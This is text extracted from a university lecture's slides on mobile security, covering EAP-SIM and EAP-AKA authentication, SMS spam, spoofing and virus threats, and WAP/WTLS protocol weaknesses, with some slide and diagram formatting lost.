EAP Authentication Methods – SIMEAP SIM (Subscriber Identity Module) Authentication for GSMEAP SIM authentication is based on Nokia’s EAP Server Technology. This provides an interface between the GSM Authentication Center and one or more wireless LANs and uses the Extensible Authentication Protocol (EAP) in order to allow it to pass traffic securely over any Wide Area Network – e.g. a Telco’s internal data network or the Internet.It permits authentication to be performed by WLAN clients that have an 802.11 interface and access to a GSM SIM card, with or without GSM air interface capabilities.This authentication procedure is designed to provide mutual authentication between a wireless LAN client and an AAA server. Typically the EAP server is implemented on the AAA server (e.g. RADIUS) and has an interface to the GSM network, so it operates as a gateway between the Internet AAA network and the GSM authentication infrastructure.The system allows GSM mobile operators to reuse their existing authentication infrastructure for providing access to wireless networks.EAP SIM combines the data from several GSM “triplets” (RAND, SRES, Kc), obtained from an Authentication Centre (AuC), to generate a more secure session encryption key. EAP SIM also enhances the basic GSM authentication mechanism by providing for mutual authentication between the client and the RADIUS server.

118

EAP Authentication Methods – SIM

SIM- Subscriber Identify Module

Usually referred to as a SIM card, The SIM is the user subscription to the mobile network. The SIM contains relevant information that enabled access control onto the subscribed operator's network.

119

120

EAP Authentication Methods – SIMThe EAP SIM authentication proceeds as follows:

The client receives an EAP Identity Request from the access point (AP). The client responds to the AP’s request with an EAP Identity Response message containing the user’s network identity which is stored on the SIM (either the user'sInternational Mobile Subscriber Identity (IMSI) or a temporary identity (pseudonym)). The AP transmits this message to the RADIUS server, which in turn forwards it to the Authentication Center of the GSM network.From the AuC the RADIUS server obtains GSM triplets and passes the RAND to the client. The SIM calculates the signed response (SRES) which is returned to the RADIUS server. The SIM also calculates cryptographic keying material, using a secure hash function on the user identity and the GSM encryption keys, for the derivation of session encryption keys.When the AAA server receives the client’s Authentication response, it calculates its own XRES and compares it to the one received from the client. If both match, the client is authenticated and the AAA server calculates the session encryption keys. It then sends a RADIUS ACCEPT message to the AP, which contains an encapsulated EAP Success message and the (encrypted) client session key.The AP installs the session key for the encryption and forwards the EAP Success message to the client which is now able to access the network.

121


122


123

EAP Authentication Methods – AKAEAP AKA (authentication and key agreement) is for UMTSFor a W-LAN-3G-inter-working the EAP AKA protocols have been developed. The basic difference in the security of the EAP SIM and EAP AKA protocols is that, while both provide mutual authentication, thenetwork-to-user authentication of EAP SIM is implicitly based on the derived key Kc , whereas the network-to-user authentication is integral part of EAP/AKA procedure.EAP/AKA is an EAP type for the UMTS Authentication and Key Agreement (AKA)EAP/AKA supports all the UMTS AKA scenarios

basic authentication, sequence number synchronization etc.Similar IMSI privacy support as in EAP/SIMEAP/AKA includes GSM compatible mode

basic GSM authentication without the enhancements of EAP/SIMThe home server knows if this particular user has been given an old GSM SIM or a newer UMTS USIMClient can refuse GSM-only authentication

124

EAP Authentication Methods – AKA

AKA is based on challenge-response mechanisms and symmetric cryptography. AKA typically runs in a UMTS Subscriber Identity Module (USIM), a smart card like device. However, the applicability of AKA is not limited to client devices with smart cards, but the AKA mechanisms could also be implemented in host software. Compared to the GSM mechanism, AKA provides substantially longer key lengths and the authentication of the server side as well as the client side.

125

EAP Authentication Methods – AKA

Client Authenticator| || EAP-Request/Identity ||<------------------------------------------------------|| || EAP-Response/Identity || (Includes user's NAI) ||------------------------------------------------------>|| || +------------------------------+| | Server runs UMTS algorithms, || | generates RAND and AUTN. || +------------------------------+| || EAP-Request/AKA-Challenge || (RAND, AUTN) ||<------------------------------------------------------|| |

+-------------------------------------+ || Client runs UMTS algorithms on USIM,| || verifies AUTN, derives RES | || and session key | |+-------------------------------------+ |

| || EAP-Response/AKA-Challenge || (RES) ||------------------------------------------------------>|| || +------------------------------+| | Server checks the given RES, || | and finds it correct. || +------------------------------+| || EAP-Success ||<------------------------------------------------------|

W-WAN Security

127

Overview

What are SMS and WAPSecurity and SMSSecurity and WAP

128

What are SMS and WAP

Short Messaging Service: SMSWireless Application Protocol: WAP

Wireless application protocol (WAP) is an application environment and set of communication protocols for wireless devices designed to enable manufacturer, vendor, and technology independent access to the Internet and advanced telephony servicesWAP specifies an application framework and network protocols for wireless devices such as mobile telephones, pagers, and personal digital assistants (PDAs).

129

SMS Threats

SMS SpamSMS SpoofingSMS Virus

130

SMS Spam

Getting to be like UCEHigh charge call scams(“call me at xxx-VERYEXPENSIVE”)All public SMS gateways and websites become victims.Spammers buy bulk services from operators

131

SMS Spoofing

Source of SMS messages is worth nothing.Roaming capabilities of users make it impossible to filter by operators.Only chance is for messages that stay within one SMSC/Operator.Intercepting replies to another address is difficult.Special case: Rogue SMSC using the Reply-Path indicator could intercept replies.

132

SMS Virus

Scenario: SMS is interpreted by phone and resend it self to all phone numbers in the phonebook and …Likelihood:

Pro: some vendors have big market shares: monoculture.Pro: phones will get more and more interpreting features.Con: zillions of versions of phones and software.

133

WAP

WAP DescriptionWAP ProtocolWAP Infrastructure issuesWML and WMLScript

134

What is WAP?

HTTP/HTML adjusted to small devicesConsists of a network architecture,a protocol stack and a Wireless Markup Language (WML)Important difference from traditional Internet model is the WAP-gatewaySpecifications at http://www.wapforum.org

135

WAP network model

136

WAP Protocol Stack

137

WAP and the Web

GSM, CDMA, etc.WDPWTLSWTPWMLWML Script

IPUDPTLS (from SSL)no counterpartHTMLJavaScript

Rationale: reuse as much as possible from IP world, but optimize for the wireless world (i.e. compression, adapt to high-loss rate.)

138

WAP Transport Layer WDP

An adaptation layer to the bearer protocol.Consists of

Source and destination address and port. Optionally fragmentationWCMP

Maps to UDP for IP bearer

139

WAP Security Layer WTLS

TLS adapted to the UDP-type usage by WAP.Encryption and authentication.Several problems identified by Markku-JuhaniSaarinen:

Weak MACRSA PKCS#1 1.5Unauthenticated alert messagesPlaintext leaks

140

WTLS

Keys generally placed in normal phone storage.New standards emerging (WAP Identity Module [WIM]) for usage of tamper-resistent devices.Aside from crypto problems:

User interface attacks likely (remember SSL problems)WTLS terminates at WAP gateway; MITM attacks possible.

141

WAP Transaction layer WTP

Three classes of transactions:Class 0: unreliableClass 1: reliable without resultClass 2: reliable with result

Does the minimum a protocol must do to create reliability.No security elements at this layer.Protocol not resistant to malicious attacks.

142

WAP Session Layer WSP

Meant to mimic the HTTP protocol.No mention of security in spec except for WTLS.Distinguishes a connected and connectionless mode.Connected mode is based on a SessionIDgiven by the server.

143

WAP Session layer WSP

Message typesConnect, ConnectReply, Redirect, DisconnectMethods: Get, Post, ReplySuspend, Resume, ReplyPush, ConfirmedPush,

144

WAP Session layer WSP

Nothing is specified on the sessionidexcept that it is not reused within the lifetime of a message.Research done in Protos (Oulu, finland) shows first implementations pretty instable.Kannel still can’t handle large amount of connections (max threads).

145

WAP Application Layer WAE

146

WML

WML based on XML and HTML.Not pages of frames, but decks with cards.Images: WBMP, WAP specificGenerally all compiled to binary by WAP gateway: Additional area of potential problems.

147

WMLScript

The WAP Javascript equivalent.Located in separate filesAlso compiled by WAP gatewayAllows automation of WML and phone functions.Javascript bugs all over again?

148

Accessing Web from Cell Phones

149

WAP Infrastructure issues

Attacking a dialed in phoneSpoofing another dialed in phoneAttacking the gateway

150

WAP gateway infra

webserver

Router/Dialin

Internet

Attack on gateway

151

Collusion attack

Roguewebserver

Router/Dialin

Internet

Modified WML/WMLScript

152

Attack on phone

webserver

Router/Dialin

Internet

153

WAP PKI

PKI portal provides PKI servicesPKI portal connected via gateway or directwith mobile phoneDevice certificates possibleNew certificate format: WTLS certificateClient certificates often not stored in client

154

Certificates for servers

Day 1 Day 2 Day 3 Day 4 Day 5 Day 6 Day 7

Cert. 1Cert. 2

Cert. 3

1. Long time certificates (as for WEB servers)• Server generates PKCS#10 request• CA sends certificate

2. Short time certificates (keine CRLs)• Client subscribes at CA (one-time)• Gets a new certificate (e.g.) every day

155

Certificates for clients

Authentication certificateClient sends cert. request using WTLS to PKI PortalProof of Possession (POP) by WTLS

Signatur certificateClient signes text for POP

Delivery:certificateLDAP-URLHTTP-URL

156

Problem: Variables in WML

WML allows setting and writing of variables

Problem: Other decks can read this variable

<wml><card>...<setvar name=shopping_cart

value=31415><do "type=accept"><go href="http://wap.versand.de/$shopping_cart">

</do></card>

</wml>

157

<wml>

<card>...<setvar name=shopping_cart

value=31415><do "type=accept"><go

href="http://wap.versand.de/$shopping_cart"></do>

</card></wml>

<access domain=wap.versand.de>

Problem: Variables in WML (cont.)

Solutions: access element

But: No cryptographic authentication of the permitteddecksVariables should not be used for passwords

158

Digitale signature within WMLScript

Crypto.signText

Text Options keyIdType keyId

Contract signed document

159

Design goals of WTLSAuthentication of communication partnerConfidentiality of communication dataIntegrity and authenticity of communicationdataInteroperabilityEfficiencyExtensibilityBut: No non-repudiation

160

PSE Data

Handshake Change Cipher Spec. ApplicationData Alert

Record

WDP

WTLS

Architecture of WTLS

161

Errare humanum est.

eTiasd

aBziEa

xdsiWn

WTLS record protokol

WDP-Protokoll

Cryptogram of„Errare ...“:Encrypted by a symmetric algorithmand protected by a MAC

Cryptogram of„Errare ...“

Compression of„Errare ...“

WTLS in principle

162

PSE Data

Handshake Change Cipher Spec. ApplicationData Alert

Record

WDP

WTLS

a

a

Architecture of WTLS (repitition)

163

Random 1

Random 2

Geheimnis

Client Write Key

Client Write MAC

Client IV

Server Write Key

Server Write MAC

Server IV

Pseudo

random gen.

6 symmetric keys

164

Random 1

certificate

Random 3

KeyGen

SessionId

KeyGen

clear data

Encrypted with server‘s public key

clear dataRandom 2

FinishedFinishedsymmetric encryption

Client and Serverare generatinga shared secret

Master SecretMaster Secret

Change CypherChange Cypherclear data

HandshakeHandshake protocolprotocol, , optionoption 1: 1: ServerServer--onlyonly authenticationauthentication

165

I have canceled thecontract for my flat3 months ago.

I did not receive any messageby Alice.The log file has been fakedby Alice!

1

2

WTLSLogfile

Sorry, I can not decide this!

3

No non-repudiation

Reason: The record protocol is based on symmetriccryptography

166

TLS vs. WTLSTLS WTLS

Fragmentation yes no

Certificates X.509 X.509 oder WTLS oder URL

Cipher Suites ohne EC mit EC

Daramms no yes

Handshake viashared secret

no yes

Checksum in alerts no yes

Sequencenumers

implicit implicit oder explicit

167

WAP summary

WAP mixes too many levels.Specs unclear in many areas concerning security sensitive issues.WAP gateway sensitive to multiple ways of attack.User interface interpretation very difficult on mobile devices.

Documents

Lecture 3 Mobile Security